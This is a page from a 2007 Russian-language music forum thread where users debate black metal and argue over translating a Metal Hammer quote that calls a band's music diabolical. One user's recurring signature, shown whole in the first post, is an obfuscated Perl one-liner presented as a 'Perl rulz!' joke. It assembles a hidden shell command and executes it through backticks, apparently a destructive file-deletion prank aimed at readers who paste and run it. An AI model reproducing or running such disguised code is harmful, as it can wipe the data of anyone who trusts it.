Добавлено: Ср Июл 25, 2007 12:37 am Заголовок сообщения:
в принципе я не большой любитель блэк метала, а вообще есть 2-3 альбома, послушиваю изредка _________________ `$=`;$_=\%!;($_)=/(.)/;$==++$|;($.,$/,$,,$\,$",$;,$^,$#,$~,$*,$:,@% )=(
$!=~/(.)(.).(.)(.)(.)(.)..(.)(.)(.)..(.)......(.)/,$"),$=++;$.++;$.++;
$_++;$_++;($_,$\,$,)=($~.$"."$;$/$%[$?]$_$\$,$:$%[$?]",$"&$~,$#,);$,++
;$,++;$^|=$";`$_$\$,$/$:$;$~$*$%[$?]$.$~$*${#}$%[$?]$;$\$"$^$~$*.>&$=`
Perl rulz!
Добавлено: Ср Июл 25, 2007 12:42 am Заголовок сообщения:
Цитата:
Та преданность, с которой команда работала над точностью и компктностью с тем, чтобы достигнуть центра тёмных эмоций мозга - оправдалась! Музыка пробуждает Зверя внутри, и, как протвиоположность Святому Граалю, он действительно от Дьявола.
_________________ Define the riddles of my mind
nothing is really as it seems
Добавлено: Ср Июл 25, 2007 12:44 am Заголовок сообщения:
As-T
это в той же мере смешно как и что "соад лучшая в мире группа" и т.п. _________________ `$=`;$_=\%!;($_)=/(.)/;$==++$|;($.,$/,$,,$\,$",$;,$^,$#,$~,$*,$:,@% )=(
Perl rulz!
Добавлено: Ср Июл 25, 2007 12:45 am Заголовок сообщения:
все сходят с ума по своему, если данные товарищи, например, считают что дьявопоклонничество - круто, и еще и называют это сатанизмом, я только улыбнусь и пройдку мимо _________________ `$=`;$_=\%!;($_)=/(.)/;$==++$|;($.,$/,$,,$\,$",$;,$^,$#,$~,$*,$:,@% )=(
Perl rulz!
As-T
это в той же мере смешно как и что "соад лучшая в мире группа" и т.п.
Цитата:
все сходят с ума по своему, если данные товарищи, например, считают что дьявопоклонничество - круто, и еще и называют это сатанизмом, я только улыбнусь и пройдку мимо
согласен, и я улыбнусь и пройду мимо, только это цитата которую я привел, принадлежит бывшему главному редактору немецкого журнала Metal Hammer Роберту Мюллеру.... _________________ Define the riddles of my mind
nothing is really as it seems
я раньше переводил статьи и интервью, и прекрасно знаю насколько "цитата" зависит от переводчика (= _________________ `$=`;$_=\%!;($_)=/(.)/;$==++$|;($.,$/,$,,$\,$",$;,$^,$#,$~,$*,$:,@% )=(
Perl rulz!
Добавлено: Чт Июл 26, 2007 4:06 am Заголовок сообщения:
ALuserX
Цитата:
The framework the band worked in imposed a new precision and compactness to their music that immediately stimulates the dark emotional center of the brain: It wakes the beast inside, if you will, and as an antithesis to the Holy Grail of rock music this is truly diabolical.
хм, я разве говорил что чтото буду переводить?) _________________ `$=`;$_=\%!;($_)=/(.)/;$==++$|;($.,$/,$,,$\,$",$;,$^,$#,$~,$*,$:,@% )=(
Perl rulz!
Как это понять?По-моему,читать на иностранном языке и,при этом,не переводить это то же самое,что слушать с закрытыми ушами. _________________ Жаркая пустыня Дагестана.За высоким барханом лежит труп.Это мой,мой,мой труп лежит.Из свежей раны течёт кровь.Это моя,моя,моя кровь течёт.И в жаркой пустыне Дагестана за высоким барханом чей-то труп знакомый валяется!Это мой труп!Нет.Это твой труп?Нет.Это наш труп!И из ещё дымящейся раны течёт алая кровь.
Что нет?Я спросил как это понять,а он нет. _________________ Жаркая пустыня Дагестана.За высоким барханом лежит труп.Это мой,мой,мой труп лежит.Из свежей раны течёт кровь.Это моя,моя,моя кровь течёт.И в жаркой пустыне Дагестана за высоким барханом чей-то труп знакомый валяется!Это мой труп!Нет.Это твой труп?Нет.Это наш труп!И из ещё дымящейся раны течёт алая кровь.
Часовой пояс: GMT + 4 На страницу Пред.1, 2, 3След.
Страница 2 из 3